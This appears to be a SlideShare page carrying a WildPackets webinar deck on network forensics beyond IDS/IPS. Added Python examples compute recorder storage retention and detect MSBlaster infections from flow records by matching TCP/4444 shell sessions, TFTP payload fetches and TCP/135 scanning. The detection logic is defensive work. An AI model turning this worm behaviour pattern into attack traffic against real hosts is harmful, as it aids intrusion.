EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 

Cyber Security - IDS/IPS is not enough

  • 1. Cyber Security – IDS/IPS Is Not Enough! Jay Botelho, Director of Product Management, WildPackets, jbotelho@wildpackets.com. Show us your tweets! Use today’s webinar hashtag #wp_cybersecurity with any questions, comments, or feedback. Follow me @jaybotelho. Follow us @wildpackets. © WildPackets, Inc. www.wildpackets.com
  • 2. Agenda
    • Current Trends in Cyber Security and Attacks
    • Cyber Attacks – Similarities and Differences
    • IDS/IPS Is Not Enough
    • Network Recording – Cyber Attack Insurance Policy
    • Cyber Attack CSI – Network Forensics
    • Company Overview
    • Product Line Overview
    Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 2
  • 3. Current Trends in Cyber Security and Attacks
  • 4. Key 2011 Cyber Attacks
    • Sony Playstation Network (April 2011)
      ‒ Account information, passwords and credit card numbers breached for 70M users
      ‒ Direct cost of $170M (Sony)
      ‒ Indirect cost estimated at 10 to 100x
    • The IMF (International Monetary Fund) (June 2011)
      ‒ Hack resulted in the loss of a “large quantity” of data, documents and email
    • Citigroup (June 2011)
      ‒ More than 200,000 customer accounts hacked
      ‒ Poor web application design made it easy
    • Android Apps
      ‒ More than 50% of the third-party apps on Google's official Android Market contained a Trojan called DroidDream, designed to steal personal data
  • 5. “2011 - The Year of the Hack”
    • So named by IT security experts
    • 60% of IT executives fear Advanced Persistent Threat (APT) attacks
    • 28% fear theft and disclosure from insiders
    • 60% use either a written “honor system” security policy or have none at all
    • 51% allow employees to download/install software
    • Companies continue to allow employees to engage in risky behaviors
    Based on Bit9’s Third Annual Endpoint Survey of 765 IT executives: http://www.businesswire.com/news/home/20110830006206/en/%E2%80%9CYear-Hack%E2%80%9D-Survey-Reveals-Enterprises-Concerned-%E2%80%9CAdvanced
  • 6. Advanced Persistent Threat – The New Buzzword for 2011/2012
    • A long-term pattern of sophisticated hacking attacks aimed at governments, companies, and political activists
    • Advanced – Full spectrum of techniques
      ‒ Not all “advanced” (e.g. malware)
      ‒ Can develop more advanced tools as required
      ‒ Combines multiple targeting methods
      ‒ Focus on operational security not found in less advanced threats
    • Persistent – Priority to a specific task
      ‒ Not opportunistically seeking information for financial gain
      ‒ A “low-and-slow” approach is typical
      ‒ Maintain long-term access to the target
    • Threat – Capability and intent
      ‒ Executed by coordinated human actions vs. automation
      ‒ Specific objective with skilled, motivated, organized and well funded entities
  • 7. Multiple Successful Attacks (chart)
  • 8. Confidence Level for Next 12 Months (chart)
  • 9. Cost For The Past 12 Months (chart)
  • 10. Source of Breaches (chart)
  • 11. Cause of Breach (chart)
  • 12. Severity and Frequency (chart)
  • 13. Types of Attacks (chart)
  • 14. Current Security Measures (chart)
    Source for slides 7 to 14: Perceptions About Network Security, Ponemon Institute Research Report, June 2011. Survey of 583 US IT and IT security practitioners; average experience 9.5 years; 51% in organizations > 5000 employees.
  • 15. Cyber Attacks – Similarities and Differences
  • 16. Example #1: Heartland Payment Systems
    • SQL injection – entering a set of SQL commands into a text entry field on the website
    • Access then gained to key servers
    • Malware then planted to collect credit and debit card numbers
    • 130M accounts breached
    • Calls into question PCI compliance and monitoring
    • Potential upside – end-to-end security for financial transactions now being more seriously investigated
  • 17. Example #2: Twitter Breach
    • Compromise personal Gmail account of employee
    • Reset Gmail password so user is unaware
    • Leverage personal email account to gain access to corporate email account (hosted by Google)
    • Read email, attachments, etc., finding things like:
      ‒ Sensitive documents
      ‒ Other user names and passwords (or at least clues)
    • Fan out into other services based on acquired info:
      ‒ Cell phone records
      ‒ MobileMe
      ‒ Amazon/iTunes
  • 18. Example #3: MSBlaster Worm
    • Exploits Microsoft Windows RPC Vulnerability
      ‒ Microsoft RPC vulnerability using TCP Port 135
    • Infected machines will attempt to propagate the worm to additional machines
      ‒ Infected machines will also attempt to launch a Distributed Denial of Service (DDoS) attack against Microsoft on the following schedule:
        • Any day in the months September - December
        • 16th to the 31st day of the months January - August
  • 19. IDS/IPS Is Not Enough
  • 20. What is IDS and IPS?
    • IDS – Intrusion Detection System
      ‒ Typically passive
      ‒ Detects and alarms on suspected intrusions using signature-based, statistical anomaly-based, and/or stateful protocol analysis detection
      ‒ Has a reputation for false positives
    • IPS – Intrusion Prevention System
      ‒ Either works alongside an IDS, or has embedded IDS capabilities of its own
      ‒ Installed in-line
      ‒ Actively prevents intrusions by dropping the malicious packets, resetting the connection and/or blocking the traffic from the offending IP address
  • 21. Limitations of IDS/IPS
    • No security product is 100%
    • Risk mitigation – what’s your risk tolerance?
    • On average 120K malware incidents identified per day by IDS/IPS
    • 5 - 20 new malware strains missed every day
    • Effectiveness vs. ease-of-use
    • Effectiveness vs. cost
    • Highly secure vs. high throughput
  • 22. And What If …
    • Data breaches are occurring from within the organization?
    • A breached mobile device or infected personal laptop brings outside threats inside the network, where they go undetected by most IDS/IPS?
    • A rogue or unauthorized device tries to access the network internally from behind the firewall?
  • 23. IDS/IPS – Key Questions
    • Will you sacrifice security for cost?
    • Where does the IDS/IPS provider get their rule set?
    • How much configuration is required?
    • How often is the rule set updated?
    • How well do they cover malware?
    • How well do they cover mainstream vulnerabilities?
    • How fast do they supply patches to update critical bugs?
  • 24. IDS/IPS Is Not Enough (figure)
    1. Attack bypasses firewall
    2. Partial attack data processed by the IDS/IPS system
    3. Network engineer gets incomplete data from switch
    Result: Incomplete reconstruction deters diagnosis!
  • 25. Changing Methods – Network Recorders (figure)
    1. Attack bypasses firewall
    2. Data Recorder records and aggregates data throughout attack
    3. Event logged, attack partially tracked by IDS
    4. Post event analysis reveals attacker, method, damage!
  • 26. Network Recording – Cyber Attack Insurance Policy
  • 27. Network Recording
    • Requires the lossless capture and storage of extremely large data volumes
    • Focus on Enterprise vs. Lawful Intercept
      ‒ Concerned with the process of reconstructing a network event
        • Intrusion such as a “hack” or other penetration
        • Network or infrastructure outage
      ‒ Provides a recording of the actual incident
    • Based on live IP packet data captures
      ‒ A new way of looking at trace file analysis
      ‒ Continues from where traditional network troubleshooting ends
  • 28. Connectivity for Network Recording (figure)
  • 29. Network Data Storage at 10G
    • 1Gbps steady-state traffic assuming no storage overhead: 7.68 GB/min, 460 GB/hr, 11 TB/day; 2.9 days in a 32TB appliance
    • 10Gbps: 76.8 GB/min, 4.6 TB/hr, 110 TB/day; 7.0 hours in a 32TB appliance
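The storage figures on this slide are the sizing question every network-recording deployment has to answer: how far back can you look after an incident? The calculator below is an added example, not WildPackets code; it generalizes the slide's two rows to any line rate, utilization and appliance size, and adds the per-packet capture overhead the slide explicitly leaves out. The slide's numbers are reproduced when the rate is passed as 1.024e9 bit/s (1024 Mbit/s per "Gbps"), which appears to be the convention the slide used; that, the 16-byte pcap record header and the 512-byte average packet in the usage call are assumptions.

```python
"""Capture-storage budget for a network recorder (added example, not
WildPackets code). Generalizes slide 29: rate, utilization, capacity and
per-packet capture overhead are all parameters."""

GB = 1e9               # the slide's GB/TB are decimal units
TB = 1e12
PCAP_RECORD_HEADER = 16  # bytes written per packet in the classic pcap format (assumption: pcap on disk)


def bytes_per_second(link_bps, utilization=1.0, avg_packet_bytes=None,
                     per_packet_overhead=0):
    """Bytes written to disk per second of sustained capture.

    link_bps is the line rate in bit/s; pass 1.024e9 to match the slide's
    "1Gbps" row (assumed convention). When an average packet size is given,
    each packet also carries the capture file's per-packet header, which the
    slide's "no storage overhead" figures ignore."""
    on_wire = link_bps / 8 * utilization
    if avg_packet_bytes and per_packet_overhead:
        on_wire *= (avg_packet_bytes + per_packet_overhead) / avg_packet_bytes
    return on_wire


def storage_rates(link_bps, **kw):
    """Return (GB per minute, GB per hour, TB per day) for the capture."""
    bps = bytes_per_second(link_bps, **kw)
    return (bps * 60 / GB, bps * 3600 / GB, bps * 86400 / TB)


def retention_hours(link_bps, capacity_bytes, **kw):
    """Hours of traffic an appliance of the given capacity holds before it must
    overwrite: the look-back window available for post-event forensics."""
    return capacity_bytes / bytes_per_second(link_bps, **kw) / 3600


if __name__ == "__main__":
    # Reproduce the slide's two rows (no overhead, 100% utilization, 32 TB appliance)
    for label, rate in (("1 Gbps", 1.024e9), ("10 Gbps", 1.024e10)):
        per_min, per_hr, per_day = storage_rates(rate)
        hours = retention_hours(rate, 32 * TB)
        print(f"{label}: {per_min:.2f} GB/min, {per_hr:.0f} GB/hr, "
              f"{per_day:.1f} TB/day, {hours:.1f} h in a 32 TB appliance")
    # A more realistic 10G link: 30% utilized, pcap headers on 512-byte packets
    realistic = retention_hours(1.024e10, 32 * TB, utilization=0.3,
                                avg_packet_bytes=512,
                                per_packet_overhead=PCAP_RECORD_HEADER)
    print(f"10 Gbps at 30% with pcap overhead: {realistic:.1f} h in a 32 TB appliance")
```

Run it and the first two lines match the slide (7.68 GB/min and 2.9 days at 1 Gbps; 7.0 hours at 10 Gbps). The third line is the number that matters for sizing: utilization shortens the disk budget less than the headline rate suggests, while small packets raise the overhead share, so a recorder sized from the slide's line-rate figures is a worst case, not a typical one.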
  • 30. Cyber Attack CSI – Network Forensics
  • 31. Key Questions
    1. Who was the intruder?
    2. How did the intruder penetrate security?
    3. What damage has been done?
    4. Did the intruder leave anything behind?
    5. Did we capture sufficient information to effectively analyze and reproduce the attack?
  • 32. MSBlaster Worm Example
  • 33. Server Connects to The Target Workstation (figure): TCP 3-Way-Handshake on Port 4444 (NV Video default)
  • 34. MSBlaster Worm Download (figure): Server infects the workstation with MSBlaster-Worm via TFTP Download
  • 35. MSBlaster Worm – Visual Reconstruction (figure)
  • 36. MSBlaster Worm Execute Command (figure): Activation command for the Blaster Worm payload; 141.157.228.12 sends the execute command to 10.1.1.31
  • 37. Infected Workstation Now Attacks Others (figure): 10.1.1.31 now scans for other nodes on the 180.191.253.XXX range
  • 38. Example #1: MSBlaster Worm – Target Ports / Execute Command (figure): Filter identifies devices infected with the MSBlaster worm
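Slides 33 to 38 walk a recorded capture backwards through one infection: a command session on TCP/4444, a TFTP download by the victim, and then the victim sweeping a new address range on TCP/135. The filter below is an added example, not the OmniPeek filter on slide 38. It expresses the same chain as a correlation over flow records (timestamp, source, destination, protocol, destination port), the form most recorders and NetFlow collectors can export, rather than over raw packets. The addresses come from the slides; the timestamps, the benign hosts 10.1.1.50, 10.1.1.60 and 10.1.1.61, the scan threshold and the time window are assumptions.

```python
"""Flow-record filter for the MSBlaster infection pattern on slides 33-38.
Added example, not the deck's OmniPeek filter. Flags a host when the slides'
sequence appears: an inbound TCP/4444 session, an outbound TFTP (UDP/69)
fetch by the same host afterwards, and outbound TCP/135 connection attempts
to many distinct hosts within a short window (the infected workstation
looking for new targets)."""
from collections import defaultdict

# Constructed sample flows: (timestamp_s, src_ip, dst_ip, proto, dst_port).
# Addresses follow the slides; timestamps and the benign hosts are assumptions.
SAMPLE_FLOWS = [
    (100.0, "141.157.228.12", "10.1.1.31", "tcp", 135),   # inbound RPC connection
    (100.4, "141.157.228.12", "10.1.1.31", "tcp", 4444),  # command session (slide 33)
    (101.0, "10.1.1.31", "141.157.228.12", "udp", 69),    # TFTP download (slide 34)
    (200.0, "10.1.1.50", "10.1.1.7", "tcp", 135),         # a single RPC connection: ordinary admin traffic
    (201.0, "10.1.1.50", "10.1.1.7", "tcp", 445),
    (210.0, "10.1.1.60", "10.1.1.61", "tcp", 4444),       # NV Video on its default port, no TFTP follows
] + [
    # slide 37: the infected workstation sweeps the 180.191.253.x range on TCP/135
    (105.0 + i, "10.1.1.31", f"180.191.253.{i}", "tcp", 135) for i in range(1, 21)
]

SCAN_THRESHOLD = 10   # distinct TCP/135 targets from one host ... (assumed tuning)
SCAN_WINDOW = 60.0    # ... within this many seconds


def peak_distinct_targets(attempts, window):
    """Largest number of distinct destinations inside any `window`-second span."""
    attempts = sorted(attempts)
    peak = 0
    for i, (t0, _) in enumerate(attempts):
        in_window = {dst for ts, dst in attempts[i:] if ts - t0 <= window}
        peak = max(peak, len(in_window))
    return peak


def infection_indicators(flows, scan_threshold=SCAN_THRESHOLD,
                         scan_window=SCAN_WINDOW):
    """Map each host to the indicators seen for it, in time order."""
    findings = defaultdict(list)
    cmd_session = {}                  # victim -> time of first inbound TCP/4444
    rpc_attempts = defaultdict(list)  # src -> [(ts, dst)] for outbound TCP/135
    for ts, src, dst, proto, dport in sorted(flows):
        if proto == "tcp" and dport == 4444:
            if dst not in cmd_session:
                cmd_session[dst] = ts
                findings[dst].append(f"inbound TCP/4444 session from {src}")
        elif proto == "udp" and dport == 69:
            # only meaningful when the same host already had the command session
            if src in cmd_session and ts > cmd_session[src]:
                findings[src].append(
                    f"outbound TFTP fetch from {dst} after the TCP/4444 session")
        elif proto == "tcp" and dport == 135:
            rpc_attempts[src].append((ts, dst))
    for host, attempts in rpc_attempts.items():
        peak = peak_distinct_targets(attempts, scan_window)
        if peak >= scan_threshold:
            findings[host].append(
                f"TCP/135 connection attempts to {peak} distinct hosts "
                f"within {scan_window:.0f}s")
    return dict(findings)


def confirmed_hosts(flows, min_indicators=2):
    """Hosts with at least `min_indicators` indicators. A lone TCP/4444
    session is not enough: the port is also NV Video's default (slide 33)."""
    return sorted(host for host, inds in infection_indicators(flows).items()
                  if len(inds) >= min_indicators)


if __name__ == "__main__":
    for host, inds in infection_indicators(SAMPLE_FLOWS).items():
        print(host)
        for ind in inds:
            print("   ", ind)
    print("confirmed:", confirmed_hosts(SAMPLE_FLOWS))
```

On the sample data 10.1.1.31 collects all three indicators and is confirmed; 10.1.1.61 shows only the TCP/4444 session and stays a lead to check by hand, which is the point of requiring more than one indicator before raising an alarm. The same correlation answers slide 31's questions 1 and 2 directly (the peer of the TCP/4444 session and the TFTP source), and the scan indicator answers question 3 for the hosts the victim went on to probe.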
  • 39. What Can You Do?
    • Processes, processes, processes
    • Implement a network recording/network forensics solution
    • Establish clear baselines so changes are easy to detect
    • Employ solutions that continuously monitor packet-level security heuristics
    • Actively search for minor policy violations that could be indicators of bigger problems
  • 40. Company Overview
  • 41. Corporate Background
    • Experts in network monitoring, analysis, and troubleshooting
      ‒ Founded: 1990 / Headquarters: Walnut Creek, CA
      ‒ Offices throughout the US, EMEA, and APAC
    • Our customers are leading edge organizations
      ‒ Mid-market, and enterprise lines of business
      ‒ Financial, manufacturing, ISPs, major federal agencies, state and local governments, and universities
      ‒ Over 7,000 customers / 60+ countries / 80% of Fortune 1,000
    • Award-winning solutions that improve network performance
      ‒ Internet Telephony, Network Magazine, Network Computing Awards
      ‒ United States Patent 5,787,253 issued July 28, 1998
    • Different approach to maintaining availability of network services
  • 42. Real-World Deployments (figure): Education, Financial, Government, Health Care / Retail, Telecom, Technology
  • 43. Product Line Overview
  • 44. Product Line Overview
    • OmniPeek/Compass – Enterprise Packet Capture, Decode and Analysis
      ‒ 10/100/1000 Ethernet, Wireless, WAN, 10G
      ‒ Portable capture and OmniEngine console
      ‒ VoIP analysis and call playback
    • Omnipliance / TimeLine – Distributed Enterprise Network Forensics
      ‒ Packet capture and real-time analysis
      ‒ Stream-to-disk for forensics analysis
      ‒ Integrated OmniAdapter network analysis cards
    • WatchPoint – Centralized Enterprise Network Monitoring Appliance
      ‒ Aggregation and graphical display of network data
      ‒ WildPackets OmniEngines
      ‒ NetFlow and sFlow
  • 45. OmniPeek Network Analyzer
    • OmniEngine Manager
      – Connect and configure distributed OmniEngines/Omnipliances
    • Comprehensive dashboards present network traffic in real-time
      – Vital statistics and graphs display trends on network and application performance
      – Visual peer-map shows conversations and protocols
      – Intuitive drill-down for root-cause analysis of performance bottlenecks
    • Visual Expert diagnosis speeds problem resolution
      – Packet and Payload visualizers provide business-centric views
    • Automated analytics and problem detection 24/7
      – Easily create filters, triggers, scripting, advanced alarms and alerts
  • 46. Omnipliance Network Recorders
    • Captures and analyzes all network traffic 24x7
      – Runs our OmniEngine software probe
      – Generates vital statistics on network and application performance
      – Intuitive root-cause analysis of performance bottlenecks
    • Expert analysis speeds problem resolution
      – Fault analysis, statistical analysis, and independent notification
    • Multiple Issue Digital Forensics
      – Real-time and post capture data mining for compliance and troubleshooting
    • Intelligent data transport
      – Network data analyzed locally
      – Detailed analysis passed to OmniPeek on demand
      – Summary statistics sent to WatchPoint for long term trending and reporting
      – Efficient use of network bandwidth
    • User-Extensible Platform
      – Plug-in architecture and SDK
  • 47. Omnipliance Network Recorders – Price/performance solutions for every application
    • Portable – Ruggedized, Troubleshooting
      – Aluminum chassis / 17” LCD
      – Quad-Core Xeon 2.5GHz
      – 4GB RAM
      – 2 PCI-E Slots
      – 2 Built-in Ethernet Ports
      – 500GB and 2.5TB SATA storage capacity
    • Edge – Small Networks, Remote Offices
      – 1U rack mountable chassis
      – Quad-Core Intel Xeon X3460 2.80Ghz
      – 4GB RAM
      – 2 PCI-E Slots
      – 2 Built-in Ethernet Ports
      – 1TB SATA storage capacity
    • Core – Datacenter Workhorse, Easily Expandable
      – 3U rack mountable chassis
      – Two Quad-Core Intel Xeon E5530 2.4Ghz
      – 6GB RAM
      – 4 PCI-E Slots
      – 2 Built-in Ethernet Ports
      – 2TB SATA storage capacity
48. TimeLine
• Fastest network recording and real-time statistical display, simultaneously
  ‒ 11.7Gbps sustained capture with zero packet loss
  ‒ Network statistics displayed in TimeLine visualization format
• Rapid, intuitive forensics search and retrieval
  ‒ Historical network traffic analysis and quick data rewinding
  ‒ Several pre-defined forensics search templates make searches easy and fast
• A natural extension to the WildPackets product line
• Turnkey bundled solution
  ‒ Appliance + OmniEngine, OmniAdapter, OmniPeek Connect
49. TimeLine: for the most demanding network analysis tasks
• TimeLine 10g Network Forensics
  – 3U rack-mountable chassis
  – Two Quad-Core Intel Xeon 5560 2.8GHz
  – 18GB RAM
  – 4 PCI-E slots
  – 2 built-in Ethernet ports
  – 8/16/32TB SATA storage capacity
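The two TimeLine slides give a capture rate (11.7Gbps sustained) and a storage range (8/16/32TB). The caveat a practitioner wants before treating a recorder as an "insurance policy" is how far back that capture actually reaches, because an intrusion is often discovered days after the first packet. The calculator below is an added example, not WildPackets code; it uses only the deck's own figures and assumes decimal units (1TB = 1e12 bytes, 1Gbps = 1e9 bit/s), full-packet capture with no slicing, and no on-disk overhead. The link rates other than 11.7Gbps are constructed inputs.

```python
"""Retention-window calculator for a full-packet network recorder.

Added example, not part of the WildPackets deck. Assumptions: decimal
units (1 TB = 1e12 bytes, 1 Gbps = 1e9 bit/s), every byte on the wire is
written to disk (no packet slicing, no compression, no filesystem or
index overhead), and the recorder overwrites oldest data when full.
"""

TB = 1e12      # bytes per terabyte (decimal, as vendors quote disks)
GBPS = 1e9     # bits per second per Gbps


def retention_hours(capacity_tb: float, avg_gbps: float) -> float:
    """Hours of packet history the disk holds at a sustained average rate."""
    if capacity_tb <= 0 or avg_gbps <= 0:
        raise ValueError("capacity and rate must be positive")
    bytes_per_second = avg_gbps * GBPS / 8
    return capacity_tb * TB / bytes_per_second / 3600


def capacity_tb_for(days: float, avg_gbps: float) -> float:
    """Storage (TB) needed to keep `days` of full-packet history at `avg_gbps`."""
    if days <= 0 or avg_gbps <= 0:
        raise ValueError("days and rate must be positive")
    return avg_gbps * GBPS / 8 * days * 86400 / TB


def covers_lookback(capacity_tb: float, avg_gbps: float, lookback_hours: float) -> bool:
    """True if the recorder still holds traffic from `lookback_hours` ago.

    This is the question that matters for forensics: if an alert fires
    72 hours after initial compromise, is the initial compromise still on disk?
    """
    return retention_hours(capacity_tb, avg_gbps) >= lookback_hours


def retention_table(capacities_tb, rates_gbps):
    """Retention (hours, rounded to 0.1) for each capacity/rate pair."""
    return {(c, r): round(retention_hours(c, r), 1)
            for c in capacities_tb for r in rates_gbps}


if __name__ == "__main__":
    # Deck figures: 8/16/32 TB at the quoted 11.7 Gbps line rate.
    # The other rates are constructed examples of lighter average loads.
    for (cap, rate), hours in retention_table([8, 16, 32], [11.7, 2.0, 0.5]).items():
        print(f"{cap:>3} TB at {rate:>5} Gbps -> {hours:>8} h "
              f"({'covers' if hours >= 72 else 'misses'} a 72 h lookback)")
    print(f"30 days at 0.5 Gbps average needs {capacity_tb_for(30, 0.5):.0f} TB")
```

At the quoted line rate the largest configuration holds roughly six hours of traffic, so a recorder sized for headline throughput only helps with attacks noticed the same shift; sizing has to start from the lookback window the incident response process needs, then work back to capacity at the link's real average rate.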
50. WatchPoint: Centralized Monitoring for Distributed Enterprise Networks
• High-level, aggregated view of all network segments
  – Monitor per campus, per region, per country
• Wide range of network data
  – NetFlow, sFlow, OmniFlow
• Web-based, customizable network dashboards
• Flexible detailed reports
• Omnipliances must be configured for continuous capture
51. WildPackets Key Differentiators
• Visual Expert intelligence with intuitive drill-down
  – Let the computer do the hard work and return results in real time
  – Packet / Payload Visualizers are faster than packet-by-packet diagnostics
  – Experts and analytics can be memorized and automated
• Automated capture analytics
  – Filters, triggers, scripting and an advanced alarming system combine to provide automated network problem detection 24x7
• Multiple-issue network forensics
  – Issues can be tracked by one or more people simultaneously
  – Real-time or post-capture
• User-extensible platform
  – Plug-in architecture and SDK
• Aggregated network views and reporting
  – NetFlow, sFlow, and OmniFlow
52. Q&A
• Use today's webinar hashtag, #wp_cybersecurity, with any questions, comments, or feedback
• Today's slides are on SlideShare: www.slideshare.net/wildpackets
• Follow us @wildpackets
53. Thank You!
WildPackets, Inc.
1340 Treat Boulevard, Suite 500
Walnut Creek, CA 94597
(925) 937-3200
www.wildpackets.com